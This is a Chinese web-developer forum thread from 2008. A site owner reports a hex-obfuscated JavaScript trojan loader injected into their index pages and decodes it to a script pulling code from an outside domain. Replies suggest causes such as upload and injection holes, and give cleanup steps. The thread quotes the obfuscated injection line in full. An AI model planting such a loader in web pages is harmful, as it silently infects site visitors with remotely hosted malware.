28,409
社区成员
发帖
与我相关
我的任务
分享网站漏洞被值JS木马问题
<script>document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x68\x74\x74\x70\x3A\x2F\x2F\x4F\x25\x36\x36\x25\x36\x36\x25\x34\x39\x25\x36\x33\x65\x25\x32\x45\x25\x34\x36\x25\x34\x31\x51\x25\x35\x33\x25\x36\x35\x25\x37\x32\x76\x2E\x25\x34\x33\x25\x36\x46\x25\x34\x44\x2F\x25\x34\x36\x25\x34\x31\x25\x35\x31\x25\x32\x45\x25\x36\x41\x25\x37\x33\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E");</script>
前几天,网站目录下的所有index文件及其包含的文件全部在文件尾加上了以上代码。
之后全部修改了,但找不到是什么原因。
现在越来越严重了,已经在文件头及文件尾或者中间都加了这个代码。
狗狗了一下还是不知所以然,所以向有经验的朋友请教。
这个情况是什么原因导致的呢?
这段代码还原了就是:http://www.59.vc/page/addr.js
遇到这样的情况应该怎么样检查呢?
还有应该怎么样去做防范呢?
前几天,网站目录下的所有index文件及其包含的文件全部在文件尾加上了以上代码。
之后全部修改了,但找不到是什么原因。
现在越来越严重了,已经在文件头及文件尾或者中间都加了这个代码。
狗狗了一下还是不知所以然,所以向有经验的朋友请教。
这个情况是什么原因导致的呢?
这段代码还原了就是:http://www.59.vc/page/addr.js
遇到这样的情况应该怎么样检查呢?
还有应该怎么样去做防范呢?
...全文
请发表友善的回复…
发表回复
ybfqlyq 2008-05-12
- 打赏
- 举报
SORRY...请管理员原谅...忙的忘记结帖了...
这个问题已经解决,,后来将整个服务器里的文件下载下来检查了原因所在,还在出在上传程序上..
下载的整站程序一定要认真检查.....:rt
这个问题已经解决,,后来将整个服务器里的文件下载下来检查了原因所在,还在出在上传程序上..
下载的整站程序一定要认真检查.....:rt
zzxap 2008-03-10
- 打赏
- 举报
最简单的方法
装“麦咖啡”杀毒软件
在策略里面加上“禁止写入asp html 。。。等文件。
一步一步检查你的服务器配置,检查漏洞 打补丁
重点检查asp上传文件的程序,对上传数据进行检验,防止上传木马。
所有办法都没用的,只能求救“麦咖啡”信我的,没错。这是我折腾了一个月的经验
装“麦咖啡”杀毒软件
在策略里面加上“禁止写入asp html 。。。等文件。
一步一步检查你的服务器配置,检查漏洞 打补丁
重点检查asp上传文件的程序,对上传数据进行检验,防止上传木马。
所有办法都没用的,只能求救“麦咖啡”信我的,没错。这是我折腾了一个月的经验
md5e 2008-03-10
- 打赏
- 举报
服务器运营商的问题,我们这里有个客户也是,原来没有的,但换了台服务也矣了
langhua983 2008-03-10
- 打赏
- 举报
ASP的确实会这样,我也碰过,都不知啥解决....
superbigbird 2008-03-10
- 打赏
- 举报
[Quote=引用 10 楼 petty1234 的回复:]
引用 9 楼 superbigbird 的回复:
这个不一定是你自己网站的问题,有可能是其他网站存在漏洞,然后上传了木马,导致服务器其他站也感染,
处理方法,把网站目录来宾帐户去掉修改插入权限,只有读取权限就可以了,如果不是自己的服务器,那就有点困难了
因为服务器的问题,只要你网站目录里有修改权限,他就可以插入,这种情况,唯一的我觉得就是在自己所有的页面里加上一段程序来禁止插入显示类似的代码。
最近好多服务…
[/Quote]
我用的瑞星的,升级到最新后,一下子就看到了,可能木马很简单吧
一个客户的网站上传目录里被人利用上传文件的漏洞上传了一个木马,然后其他网站每天都会被插入代码,最后删除了重装了系统做了下安全设置就好了
引用 9 楼 superbigbird 的回复:
这个不一定是你自己网站的问题,有可能是其他网站存在漏洞,然后上传了木马,导致服务器其他站也感染,
处理方法,把网站目录来宾帐户去掉修改插入权限,只有读取权限就可以了,如果不是自己的服务器,那就有点困难了
因为服务器的问题,只要你网站目录里有修改权限,他就可以插入,这种情况,唯一的我觉得就是在自己所有的页面里加上一段程序来禁止插入显示类似的代码。
最近好多服务…
[/Quote]
我用的瑞星的,升级到最新后,一下子就看到了,可能木马很简单吧
一个客户的网站上传目录里被人利用上传文件的漏洞上传了一个木马,然后其他网站每天都会被插入代码,最后删除了重装了系统做了下安全设置就好了
petty1234 2008-03-10
- 打赏
- 举报
[Quote=引用 9 楼 superbigbird 的回复:]
这个不一定是你自己网站的问题,有可能是其他网站存在漏洞,然后上传了木马,导致服务器其他站也感染,
处理方法,把网站目录来宾帐户去掉修改插入权限,只有读取权限就可以了,如果不是自己的服务器,那就有点困难了
因为服务器的问题,只要你网站目录里有修改权限,他就可以插入,这种情况,唯一的我觉得就是在自己所有的页面里加上一段程序来禁止插入显示类似的代码。
最近好多服务器被挂了这个马,我的也被挂了,服务器…
[/Quote]楼上的用用瑞星可以清楚吗?现在我用nod32和诺顿都没有查出来。。。
这个不一定是你自己网站的问题,有可能是其他网站存在漏洞,然后上传了木马,导致服务器其他站也感染,
处理方法,把网站目录来宾帐户去掉修改插入权限,只有读取权限就可以了,如果不是自己的服务器,那就有点困难了
因为服务器的问题,只要你网站目录里有修改权限,他就可以插入,这种情况,唯一的我觉得就是在自己所有的页面里加上一段程序来禁止插入显示类似的代码。
最近好多服务器被挂了这个马,我的也被挂了,服务器…
[/Quote]楼上的用用瑞星可以清楚吗?现在我用nod32和诺顿都没有查出来。。。
superbigbird 2008-03-10
- 打赏
- 举报
这个不一定是你自己网站的问题,有可能是其他网站存在漏洞,然后上传了木马,导致服务器其他站也感染,
处理方法,把网站目录来宾帐户去掉修改插入权限,只有读取权限就可以了,如果不是自己的服务器,那就有点困难了
因为服务器的问题,只要你网站目录里有修改权限,他就可以插入,这种情况,唯一的我觉得就是在自己所有的页面里加上一段程序来禁止插入显示类似的代码。
最近好多服务器被挂了这个马,我的也被挂了,服务器杀毒 应该会查出一个木马文件,我的就是用瑞星杀出来的,杀不出来只能看下相关的上传目录里是否有其他的可疑文件
处理方法,把网站目录来宾帐户去掉修改插入权限,只有读取权限就可以了,如果不是自己的服务器,那就有点困难了
因为服务器的问题,只要你网站目录里有修改权限,他就可以插入,这种情况,唯一的我觉得就是在自己所有的页面里加上一段程序来禁止插入显示类似的代码。
最近好多服务器被挂了这个马,我的也被挂了,服务器杀毒 应该会查出一个木马文件,我的就是用瑞星杀出来的,杀不出来只能看下相关的上传目录里是否有其他的可疑文件
petty1234 2008-03-10
- 打赏
- 举报
这个问题,这几天一直困着我。。。。
一把编程的菜刀 2008-03-04
- 打赏
- 举报
呵呵,你要懒的话就没人可以帮你了
要不你就出钱让人帮你搞定
要不你就出钱让人帮你搞定
ybfqlyq 2008-03-04
- 打赏
- 举报
太懒了..还是没有解决掉这个问题...
myvicy 2008-02-25
- 打赏
- 举报
作好服务器安全防范!
斯洛文尼亚旅游 2008-02-25
- 打赏
- 举报
如果物理文件被插入上面的代码,那么应该是代码有漏洞或者中招了
如果物理文件没有,那有可能是被arp了
如果物理文件没有,那有可能是被arp了
quweiie 2008-02-25
- 打赏
- 举报
下个淘特ASP木马扫描器 扫一下,在扫之前 先把数据库备份下.
tantaiyizu 2008-02-25
- 打赏
- 举报
服务器修复漏洞,杀毒是关键。
至于现有感染的文件,自己写个vbs就可以统一给替换掉了
还可以回复下站点。
至于现有感染的文件,自己写个vbs就可以统一给替换掉了
还可以回复下站点。
一把编程的菜刀 2008-02-25
- 打赏
- 举报
是因为你的网站被人入侵了
检查你的网站是否有注入和上传漏洞
记得还有一个备份和还原数据库功能的漏洞
检查这些原因,如果这些漏洞都不存在,那就是服务器被人入侵,跨站入侵你的网站了!
检查你的网站是否有注入和上传漏洞
记得还有一个备份和还原数据库功能的漏洞
检查这些原因,如果这些漏洞都不存在,那就是服务器被人入侵,跨站入侵你的网站了!
